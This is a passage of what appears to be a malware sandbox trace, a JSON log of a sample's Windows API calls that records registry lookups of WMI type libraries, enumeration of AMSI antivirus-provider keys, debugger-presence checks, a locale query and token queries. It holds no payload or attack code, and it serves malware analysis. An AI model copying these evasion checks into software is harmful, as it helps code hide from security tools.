"id": 943 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000382" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 944 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x90\\x96\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x82\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x90\\x97\\x7f\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 945 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 946 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000382" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 947 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000384" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000382" }, { "name": "ObjectAttributesName", "value": "win64" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 948 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000386" }, { "name": "ValueName", "value": "" }, { "name": "Data", "value": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)" } ], "repeated": 0, "id": 949 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000386" } ], "repeated": 0, "id": 950 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000382" } ], "repeated": 0, "id": 951 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037e" } ], "repeated": 0, "id": 952 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037a" } ], "repeated": 0, "id": 953 }, { "timestamp": "2025-11-20 10:58:29,812", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000376" } ], "repeated": 0, "id": 954 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 955 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000033c" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 956 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00962000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 957 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\AMSI\\Providers" }, { "name": "Handle", "value": "0x0000037c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\AMSI\\Providers" } ], "repeated": 0, "id": 958 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000037c" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "38" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "0" }, { "name": "MaxValueNameLength", "value": "0" }, { "name": "MaxValueLength", "value": "0" } ], "repeated": 0, "id": 959 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037c" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "{2781761E-28E0-4109-99FE-B9D127C57AFE}" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}" } ], "repeated": 0, "id": 960 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 961 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000000c8" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 962 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000000c8" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32" } ], "repeated": 0, "id": 963 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "IsDebuggerPresent", "status": false, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 964 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegEnumKeyExW", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x0000037c" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\" } ], "repeated": 0, "id": 965 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037c" } ], "repeated": 0, "id": 966 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000378" } ], "repeated": 0, "id": 967 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00965000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 968 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00968000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 969 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\AMSI\\Providers" }, { "name": "Handle", "value": "0x0000037c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\AMSI\\Providers" } ], "repeated": 0, "id": 970 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000037c" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "38" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "0" }, { "name": "MaxValueNameLength", "value": "0" }, { "name": "MaxValueLength", "value": "0" } ], "repeated": 0, "id": 971 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037c" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "{2781761E-28E0-4109-99FE-B9D127C57AFE}" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}" } ], "repeated": 0, "id": 972 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 973 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000000c8" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 974 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x000000c8" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\CLSID\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\\InprocServer32" } ], "repeated": 0, "id": 975 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "IsDebuggerPresent", "status": false, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 976 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegEnumKeyExW", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x0000037c" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\AMSI\\Providers\\" } ], "repeated": 0, "id": 977 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037c" } ], "repeated": 0, "id": 978 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140085182", "parentcaller": "0x1400a6caf", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000378" } ], "repeated": 0, "id": 979 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000419", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000419" }, { "name": "LanguageName", "value": "Russian" } ], "repeated": 0, "id": 980 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "00000346-0000-0000-C000-000000000046" }, { "name": "ClsContext", "value": "0x00000001", "pretty_value": "CLSCTX_INPROC_SERVER" }, { "name": "riid", "value": "E085AD58-B839-4625-B40B-4CC546E82D75" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 981 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020119", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom" } ], "repeated": 0, "id": 982 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000378" } ], "repeated": 0, "id": 983 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "20" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 984 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "18" }, { "name": "TokenInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 985 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "@\\x92\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x93\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 986 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000037c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes" } ], "repeated": 0, "id": 987 }, { "timestamp": "2025-11-20 10:58:33,906", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000378" } ], "repeated": 0, "id": 988 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "TypeLib" }, { "name": "Handle", "value": "0x0000037a" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib" } ], "repeated": 0, "id": 989 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037e" } ], "repeated": 0, "id": 990 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037a" }, { "name": "SubKey", "value": "{565783C6-CB41-11D1-8B02-00600806D9B6}" }, { "name": "Handle", "value": "0x0000037e" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}" } ], "repeated": 0, "id": 991 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "1.0" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0" } ], "repeated": 0, "id": 992 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegEnumKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000037e" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "1.2" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2" } ], "repeated": 0, "id": 993 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegEnumKeyExW", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x0000037e" }, { "name": "Index", "value": "1" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\" } ], "repeated": 0, "id": 994 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000037e" }, { "name": "SubKey", "value": "1.2" }, { "name": "Handle", "value": "0x00000382" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2" } ], "repeated": 0, "id": 995 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000382" }, { "name": "SubKey", "value": "419" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419" } ], "repeated": 0, "id": 996 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x00000382" }, { "name": "SubKey", "value": "19" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19" } ], "repeated": 0, "id": 997 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000382" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x00000386" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" } ], "repeated": 0, "id": 998 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000386" }, { "name": "SubKey", "value": "win64" }, { "name": "Handle", "value": "0x0000038a" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64" } ], "repeated": 0, "id": 999 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000038a" } ], "repeated": 0, "id": 1000 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000386" } ], "repeated": 0, "id": 1001 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000382" }, { "name": "SubKey", "value": "0" }, { "name": "Handle", "value": "0x00000386" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" } ], "repeated": 0, "id": 1002 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000386" }, { "name": "KeyInformation", "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0" }, { "name": "KeyInformationClass", "value": "3" } ], "repeated": 0, "id": 1003 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "registry", "api": "NtQueryKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000386" }, { "name": "KeyInformation", "value": "\\x00\\x00\\x00\\x00" }, { "name": "KeyInformationClass", "value": "7" } ], "repeated": 0, "id": 1004 }, { "timestamp": "2025-11-20 10:58:33,922", "thread_id": "2188", "caller": "0x140084812", "parentcaller": "0x1400a8304", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": 